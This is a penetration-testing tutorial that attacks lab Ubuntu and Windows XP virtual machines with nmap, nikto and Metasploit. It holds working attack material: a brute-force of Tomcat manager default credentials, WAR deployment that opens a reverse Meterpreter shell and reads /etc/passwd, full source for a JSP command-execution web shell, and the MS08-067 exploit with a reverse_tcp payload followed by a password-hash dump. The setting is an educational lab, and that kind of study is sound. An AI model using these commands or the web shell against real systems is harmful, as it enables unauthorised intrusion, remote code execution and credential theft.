Exploitation Ubuntu Windows Services

---

This tutorial outlines many of the security flaws on both OS machines, such as:

Gathering information

Identify open network services

Exploit vulnerable services

(Note: For the Purpose of this tutorial BackBox (Based on Ubuntu) as OS, the latest installation package of Oracle VM Box, and Ubuntu 9.04 / Windows XP SP2 OS’s will be used) Setting Up VM – Manual ifconfig Before starting our Penetration Testing on the VM’s, we’ll setup and configure a couple of things on the VM machine system. After we have created our OS machine (Both Ubuntu and Windows OS) click the “Settings” button and navigate to the “Network” tab once more. At network interface, choose the “Host-only Adapter” and automatically the vboxnet0 option will be set.

Next we’ll set up the eth0 interface for Ubuntu OS. On the terminal type: [c] ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up [/c] If you would like to have the network information statically assigned without having to manually enter this information each time, you can edit the /etc/network/ interfaces file for the appropriate Ethernet device. [c] # The host-only network interface auto eth0 iface eth0 inet static address 192.168.56.102 netmask 255.255.255.0 network 192.168.56.0 broadcast 192.168.56.255 [/c] (Note: Be sure to restart the network service after modifying this file (/etc/init.d/ networking restart).) Next you will set up the Windows Network Interface. On the command prompt type cmd and click “OK”.

Then Navigate to the Network Connections Panel.

Next at the properties panel choose “Internet Protocol(TCP/IP)” and click “Properties”. On the “General” tab choose the “Use the following IP address” and add the appropriate network information (see below):

Next at the command prompt write the following command to verify the adapter options: [c] ipconfig /all [/c]

Verifying connectivity We will attempt to ping the machines to verify connectivity. If everything is configured correctly, you should see something along the lines of the following commands: Ubuntu Machine: [c] root@wizard32:~# ping 192.168.56.102 PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data. 64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms 64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms ^C — 192.168.56.102 ping statistics — 2 packets transmitted, 2 received, 0% packet loss, time 999ms rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms [/c] And [c] root@ubuntu:~$ ping 192.168.56.1 PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data. 64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms 64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms ^C — 192.168.56.1 ping statistics — 2 packets transmitted, 2 received, 0% packet loss, time 1001ms rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms [/c] Windows Machine: [c] root@wizard32:~# ping 192.168.56.103 PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data. 64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms 64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms ^C — 192.168.56.103 ping statistics — 2 packets transmitted, 2 received, 0% packet loss, time 1000ms rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms [/c] And [c] C:Documents and Settingswindowsxp>ping 192.168.56.1 Pinging 192.168.56.1 with 32 bytes of data: Reply from 192.168.56.1: bytes=32 time<1ms TTL=64 Reply from 192.168.56.1: bytes=32 time<1ms TTL=64 Ping statistics for 192.168.56.1 Packets: Sent = 2, Received = 2, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms [/c] Gathering Information – Ubuntu Machine We’ll begin by trying some basic scans against our VM (Ubuntu) machine at 192.168.56.102. Here we will perform a simple scan to determine what ports are open on our target system using the -p option. [c] root@wizard32:~# nmap -p- 192.168.56.102 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST Nmap scan report for 192.168.56.102 Host is up (0.00020s latency). Not shown: 65522 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3306/tcp open mysql 3632/tcp open distccd 5432/tcp open postgresql 8009/tcp open ajp13 8180/tcp open unknown MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems) Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds [/c] Looking at the highlighted results, we can determine that there are many open ports. So let’s use another tool to identify a little bit more on our machine. [c] root@wizard32:~# nikto -h 192.168.56.102 -p 8180 – Nikto v2.1.4 ————————————————————————— + Target IP: 192.168.56.102 + Target Hostname: 192.168.56.102 + Target Port: 8180 + Start Time: 2013-06-19 14:04:00 ————————————————————————— + Server: Apache-Coyote/1.1 + No CGI Directories found (use ‘-C all’ to force check all possible dirs) + OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS + OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server. + OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details. + /: Appears to be a default Apache Tomcat install. + OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin. + OSVDB-3092: /admin/: This might be interesting… + OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found. + OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found. + OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found. + OSVDB-3092: /webdav/index.html: WebDAV support is enabled. + OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation. + /admin/account.html: Admin login page/section found. + /admin/controlpanel.html: Admin login page/section found. + /admin/cp.html: Admin login page/section found. + /admin/index.html: Admin login page/section found. + /admin/login.html: Admin login page/section found. + /servlets-examples/: Tomcat servlets examples are visible. + 6448 items checked: 0 error(s) and 19 item(s) reported on remote host + End Time: 2013-06-19 14:05:24 (84 seconds) ————————————————————————— + 1 host(s) tested[/c] Exploit Vulnerable Backdoors By reviewing the highlighted code closely we can see that the port 8180/tcp runs an Apache Tomcat Server. We can identify the Version of Apache Tomcat Server once more using Metasploit. [c] msf > use auxiliary/admin/http/tomcat_administration msf auxiliary(tomcat_administration) > show options Module options (auxiliary/admin/http/tomcat_administration): Name Current Setting Required Description —- ————— ——– ———– Proxies no Use a proxy chain RHOSTS yes The target address range or CIDR identifier RPORT 8180 yes The target port THREADS 1 yes The number of concurrent threads TOMCAT_PASS no The password for the specified username TOMCAT_USER no The username to authenticate as VHOST no HTTP server virtual host msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102 RHOSTS => 192.168.56.102 msf auxiliary(tomcat_administration) > run [] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat] [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed [/c] As we can see, Apache Tomcat/5.5 is used. So once more using Metasploit we’ll try to connect to the Apache Tomcat Server according to some default user/pass options: [c] msf > use auxiliary/scanner/http/tomcat_mgr_login msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102 RHOSTS => 192.168.56.102 msf auxiliary(tomcat_mgr_login) > set RPORT 8180 RPORT => 8180 msf auxiliary(tomcat_mgr_login) > run [] 192.168.56.102:8180 TOMCAT_MGR – [01/63] – Trying username:” with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [01/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ” [] 192.168.56.102:8180 TOMCAT_MGR – [02/63] – Trying username:’admin’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [02/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’ [] 192.168.56.102:8180 TOMCAT_MGR – [03/63] – Trying username:’manager’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [03/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’ [] 192.168.56.102:8180 TOMCAT_MGR – [04/63] – Trying username:’role1′ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [04/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’ [] 192.168.56.102:8180 TOMCAT_MGR – [05/63] – Trying username:’root’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [05/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [06/63] – Trying username:’tomcat’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [06/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘tomcat’ [] 192.168.56.102:8180 TOMCAT_MGR – [07/63] – Trying username:’both’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [07/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] 192.168.56.102:8180 TOMCAT_MGR – [08/63] – Trying username:’j2deployer’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [08/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’ [] 192.168.56.102:8180 TOMCAT_MGR – [09/63] – Trying username:’ovwebusr’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [09/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’ [] 192.168.56.102:8180 TOMCAT_MGR – [10/63] – Trying username:’cxsdk’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [10/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’ [] 192.168.56.102:8180 TOMCAT_MGR – [11/63] – Trying username:’ADMIN’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [11/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’ [] 192.168.56.102:8180 TOMCAT_MGR – [12/63] – Trying username:’xampp’ with password:” [-] 192.168.56.102:8180 TOMCAT_MGR – [12/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’ [] 192.168.56.102:8180 TOMCAT_MGR – [13/63] – Trying username:’admin’ with password:’admin’ [-] 192.168.56.102:8180 TOMCAT_MGR – [13/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’ [] 192.168.56.102:8180 TOMCAT_MGR – [14/63] – Trying username:’manager’ with password:’manager’ [-] 192.168.56.102:8180 TOMCAT_MGR – [14/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’ [] 192.168.56.102:8180 TOMCAT_MGR – [15/63] – Trying username:’role1′ with password:’role1′ [-] 192.168.56.102:8180 TOMCAT_MGR – [15/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’ [] 192.168.56.102:8180 TOMCAT_MGR – [16/63] – Trying username:’root’ with password:’root’ [-] 192.168.56.102:8180 TOMCAT_MGR – [16/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [17/63] – Trying username:’tomcat’ with password:’tomcat’ [+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’ [] 192.168.56.102:8180 TOMCAT_MGR – [18/63] – Trying username:’both’ with password:’both’ [-] 192.168.56.102:8180 TOMCAT_MGR – [18/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] 192.168.56.102:8180 TOMCAT_MGR – [19/63] – Trying username:’j2deployer’ with password:’j2deployer’ [-] 192.168.56.102:8180 TOMCAT_MGR – [19/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’ [] 192.168.56.102:8180 TOMCAT_MGR – [20/63] – Trying username:’ovwebusr’ with password:’ovwebusr’ [-] 192.168.56.102:8180 TOMCAT_MGR – [20/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’ [] 192.168.56.102:8180 TOMCAT_MGR – [21/63] – Trying username:’cxsdk’ with password:’cxsdk’ [-] 192.168.56.102:8180 TOMCAT_MGR – [21/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’ [] 192.168.56.102:8180 TOMCAT_MGR – [22/63] – Trying username:’ADMIN’ with password:’ADMIN’ [-] 192.168.56.102:8180 TOMCAT_MGR – [22/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’ [] 192.168.56.102:8180 TOMCAT_MGR – [23/63] – Trying username:’xampp’ with password:’xampp’ [-] 192.168.56.102:8180 TOMCAT_MGR – [23/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’ [] 192.168.56.102:8180 TOMCAT_MGR – [24/63] – Trying username:’ovwebusr’ with password:’OvWbusr1′ [-] 192.168.56.102:8180 TOMCAT_MGR – [24/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’ [] 192.168.56.102:8180 TOMCAT_MGR – [25/63] – Trying username:’cxsdk’ with password:’kdsxc’ [-] 192.168.56.102:8180 TOMCAT_MGR – [25/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’ [] 192.168.56.102:8180 TOMCAT_MGR – [26/63] – Trying username:’root’ with password:’owaspbwa’ [-] 192.168.56.102:8180 TOMCAT_MGR – [26/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [27/63] – Trying username:” with password:’admin’ [-] 192.168.56.102:8180 TOMCAT_MGR – [27/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ” [] 192.168.56.102:8180 TOMCAT_MGR – [28/63] – Trying username:” with password:’manager’ [-] 192.168.56.102:8180 TOMCAT_MGR – [28/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ” [] 192.168.56.102:8180 TOMCAT_MGR – [29/63] – Trying username:” with password:’role1′ [-] 192.168.56.102:8180 TOMCAT_MGR – [29/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ” [] 192.168.56.102:8180 TOMCAT_MGR – [30/63] – Trying username:” with password:’root’ [-] 192.168.56.102:8180 TOMCAT_MGR – [30/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ” [] 192.168.56.102:8180 TOMCAT_MGR – [31/63] – Trying username:” with password:’tomcat’ [-] 192.168.56.102:8180 TOMCAT_MGR – [31/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ” [] 192.168.56.102:8180 TOMCAT_MGR – [32/63] – Trying username:” with password:’s3cret’ [-] 192.168.56.102:8180 TOMCAT_MGR – [32/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ” [] 192.168.56.102:8180 TOMCAT_MGR – [33/63] – Trying username:’admin’ with password:’manager’ [-] 192.168.56.102:8180 TOMCAT_MGR – [33/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’ [] 192.168.56.102:8180 TOMCAT_MGR – [34/63] – Trying username:’admin’ with password:’role1′ [-] 192.168.56.102:8180 TOMCAT_MGR – [34/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’ [] 192.168.56.102:8180 TOMCAT_MGR – [35/63] – Trying username:’admin’ with password:’root’ [-] 192.168.56.102:8180 TOMCAT_MGR – [35/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’ [] 192.168.56.102:8180 TOMCAT_MGR – [36/63] – Trying username:’admin’ with password:’tomcat’ [-] 192.168.56.102:8180 TOMCAT_MGR – [36/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’ [] 192.168.56.102:8180 TOMCAT_MGR – [37/63] – Trying username:’admin’ with password:’s3cret’ [-] 192.168.56.102:8180 TOMCAT_MGR – [37/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’ [] 192.168.56.102:8180 TOMCAT_MGR – [38/63] – Trying username:’manager’ with password:’admin’ [-] 192.168.56.102:8180 TOMCAT_MGR – [38/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’ [] 192.168.56.102:8180 TOMCAT_MGR – [39/63] – Trying username:’manager’ with password:’role1′ [-] 192.168.56.102:8180 TOMCAT_MGR – [39/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’ [] 192.168.56.102:8180 TOMCAT_MGR – [40/63] – Trying username:’manager’ with password:’root’ [-] 192.168.56.102:8180 TOMCAT_MGR – [40/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’ [] 192.168.56.102:8180 TOMCAT_MGR – [41/63] – Trying username:’manager’ with password:’tomcat’ [-] 192.168.56.102:8180 TOMCAT_MGR – [41/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’ [] 192.168.56.102:8180 TOMCAT_MGR – [42/63] – Trying username:’manager’ with password:’s3cret’ [-] 192.168.56.102:8180 TOMCAT_MGR – [42/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’ [] 192.168.56.102:8180 TOMCAT_MGR – [43/63] – Trying username:’role1′ with password:’admin’ [-] 192.168.56.102:8180 TOMCAT_MGR – [43/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’ [] 192.168.56.102:8180 TOMCAT_MGR – [44/63] – Trying username:’role1′ with password:’manager’ [-] 192.168.56.102:8180 TOMCAT_MGR – [44/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’ [] 192.168.56.102:8180 TOMCAT_MGR – [45/63] – Trying username:’role1′ with password:’root’ [-] 192.168.56.102:8180 TOMCAT_MGR – [45/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’ [] 192.168.56.102:8180 TOMCAT_MGR – [46/63] – Trying username:’role1′ with password:’tomcat’ [-] 192.168.56.102:8180 TOMCAT_MGR – [46/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’ [] 192.168.56.102:8180 TOMCAT_MGR – [47/63] – Trying username:’role1′ with password:’s3cret’ [-] 192.168.56.102:8180 TOMCAT_MGR – [47/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1’ [] 192.168.56.102:8180 TOMCAT_MGR – [48/63] – Trying username:’root’ with password:’admin’ [-] 192.168.56.102:8180 TOMCAT_MGR – [48/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [49/63] – Trying username:’root’ with password:’manager’ [-] 192.168.56.102:8180 TOMCAT_MGR – [49/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [50/63] – Trying username:’root’ with password:’role1′ [-] 192.168.56.102:8180 TOMCAT_MGR – [50/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [51/63] – Trying username:’root’ with password:’tomcat’ [-] 192.168.56.102:8180 TOMCAT_MGR – [51/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [52/63] – Trying username:’root’ with password:’s3cret’ [-] 192.168.56.102:8180 TOMCAT_MGR – [52/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’ [] 192.168.56.102:8180 TOMCAT_MGR – [53/63] – Trying username:’both’ with password:’admin’ [-] 192.168.56.102:8180 TOMCAT_MGR – [53/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] 192.168.56.102:8180 TOMCAT_MGR – [54/63] – Trying username:’both’ with password:’manager’ [-] 192.168.56.102:8180 TOMCAT_MGR – [54/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] 192.168.56.102:8180 TOMCAT_MGR – [55/63] – Trying username:’both’ with password:’role1′ [-] 192.168.56.102:8180 TOMCAT_MGR – [55/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] 192.168.56.102:8180 TOMCAT_MGR – [56/63] – Trying username:’both’ with password:’root’ [-] 192.168.56.102:8180 TOMCAT_MGR – [56/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] 192.168.56.102:8180 TOMCAT_MGR – [57/63] – Trying username:’both’ with password:’tomcat’ [-] 192.168.56.102:8180 TOMCAT_MGR – [57/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] 192.168.56.102:8180 TOMCAT_MGR – [58/63] – Trying username:’both’ with password:’s3cret’ [-] 192.168.56.102:8180 TOMCAT_MGR – [58/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’ [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed [/c] Reviewing the result we can identify that Apache Tomcat Server accepts as username/password the “tomcat” string, so according to this result, let’s exploit it: [c] msf> use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description —- ————— ——– ———– PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port USERNAME no The username to authenticate as VHOST no HTTP server virtual host Exploit target: Id Name — —- 0 Automatic msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102 RHOST => 192.168.56.102 msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat USERNAME => tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat PASSWORD => tomcat msf exploit(tomcat_mgr_deploy) > set RPORT 8180 RPORT => 8180 msf exploit(tomcat_mgr_deploy) > exploit [] Started reverse handler on 192.168.56.1:4444 [] Attempting to automatically select a target… [] Automatically selected target “Linux x86” [] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war … [] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp… [] Undeploying DqyPmto6a9UzwBp3l1AUIFIT … [] Sending stage (30246 bytes) to 192.168.56.102 [] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300 meterpreter > getuid Server username: tomcat55 meterpreter > shell Process 1 created. Channel 1 created. id uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup) cd /etc cat passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh :: : [/c] Vulnerable Web Service Open a browser and type in the field, the IP of the VM and specify the port of Apache Tomcat server (IP:Port)

Next click on “Tomcat Manager” from the Administration Panel at the left and type as username/password the “tomcat” string.

Next we’ll create and upload a vulnerable .war file which will give us access to execute a vulnerable code. So create a cmd_shell.jsp file, which will contain the following code: [js] <%@ page import=“java.util.,java.io.”%> <% %>Note: Against Windows you may need to prefix your command with cmd.exe /c

JSP Command:

 <% if (request.getParameter(“cmd”) != null) { out.println(“Command: " + request.getParameter(“cmd”) + “
”); Process p = Runtime.getRuntime().exec(request.getParameter(“cmd”)); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> 

[/js] Then compress the file using the jar command as follows: [c] jar -cvf cmd.war cmd_shell.jsp [/c] (Note: .war format is the acceptable file type for deploy at Apache Tomcat Manager) Next Browse the .war file and then deploy it. As we can see the /cmd path was added.

Click this path and then on the navigation bar to complete the path adding cmd_shell.jsp:

At this point we can type any Unix/Windows command like running a command prompt window.

Gathering Information – Windows XP Machine We’ll begin by trying some basic scan as previews against our VM (Windows XP) machine at 192.168.56.103. [c] root@wizard32:~# nmap -p- 192.168.56.103 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST Nmap scan report for 192.168.56.103 Host is up (0.00070s latency). Not shown: 65528 closed ports PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems) Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds [/c] Looking at the highlighted results, we can determine that there are many open ports. So let’s focus on port 445. Using the nmap tool once more we’ll add a couple of parameters to discover a little bit more of the specific port. [c] root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST Nmap scan report for 192.168.56.103 Host is up (0.00055s latency). PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: , NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems) |smbv2-enabled: Server doesn’t support SMBv2 protocol | smb-security-mode: | Account that was used for smb scripts: guest | User-level authentication | SMB Security: Challenge/response passwords supported | Message signing disabled (dangerous, but default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Computer name: windowsx-c7b000 | NetBIOS computer name: WINDOWSX-C7B000 | Workgroup: WORKGROUP | System time: 2013-06-18 04:36:59 UTC+3 TRACEROUTE HOP RTT ADDRESS 1 0.55 ms 192.168.56.103 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds [/c] –A: Aggressive initiates many options at once such as version and script scanning. Use with caution. -T (0-5): Timing options Determines how aggressive you want the scan to be. -Pn: We stop this action for sending out a pingrequest -p: Only scan specified ports Identify network services – Exploit Vulnerable Backdoors By reviewing the highlighted code closely we can see that the port 445/tcp runs a SMB Server. We can identify the OS environment which the SMB server runs by typing: [c] msf > use auxiliary/scanner/smb/smb_version msf auxiliary(smb_version) > set RHOSTS 192.168.56.103 RHOSTS => 192.168.56.103 msf auxiliary(smb_version) > run [] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP) [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed [/c] As we can see, the SMB Server runs on the Windows XP SP2 environment. So once more using Metasploit will try to exploit it. [c] msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103 RHOST => 192.168.56.103 set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description —- ————— ——– ———– RHOST 192.168.56.103 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description —- ————— ——– ———– EXITFUNC thread yes Exit technique: seh, thread, process, none LHOST 192.168.56.1 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name — —- 0 Automatic Targeting msf exploit(ms08_067_netapi) > exploit [] Started reverse handler on 192.168.56.1:4444 [] Automatically detecting the target… [] Fingerprint: Windows XP – Service Pack 2 – lang:English [] Selected Target: Windows XP SP2 English (AlwaysOn NX) [] Attempting to trigger the vulnerability… [] Sending stage (751104 bytes) to 192.168.56.103 [] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300 meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter > sysinfo Computer : WINDOWSX-C7B000 OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645::: IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b::: IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7::: windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter > shell Process 1908 created. Channel 1 created. 